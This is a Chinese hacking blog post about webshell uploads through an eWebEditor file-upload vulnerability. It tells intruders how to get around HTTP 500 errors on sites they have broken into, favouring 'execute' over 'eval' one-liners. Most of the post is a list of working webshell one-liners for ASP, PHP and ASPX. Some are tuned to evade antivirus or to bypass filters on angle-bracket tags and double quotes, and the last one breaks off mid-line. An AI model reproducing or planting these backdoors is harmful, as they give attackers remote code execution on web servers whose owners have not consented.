应对eWebEditor漏洞上传文件500错误的方法

相信大家对eWebEditor并不陌生

大家在搞站的可否发现有的uploadfiles目录里面传上去的大马或小马是500错误

入侵了这么久,发现在此情况下,上传一句话,可以连接!

eval的一句话有时候会失败

execute的一句话基本上都是成功的!

By:van

附:(多种写一句话的方法)

ASP一句话
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))%>

免杀大部分网站的一句话
4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>

免杀部分网站过略<%,%>的一句话
5.<script language=VBScript runat=server>execute request("YouPass")</script%gt;

免杀部分网站过略双引号的一句话
6.<%eval request(YouPass(35))%>

php一句话
7.<?php eval($_POST[YouPass]);?>

aspx一句话
8.<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("

上一篇: eWebEditor文件上传漏洞的修补方法
下一篇: eWebEditor文件上传漏洞的利用
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: ASP 黑客
相关日志: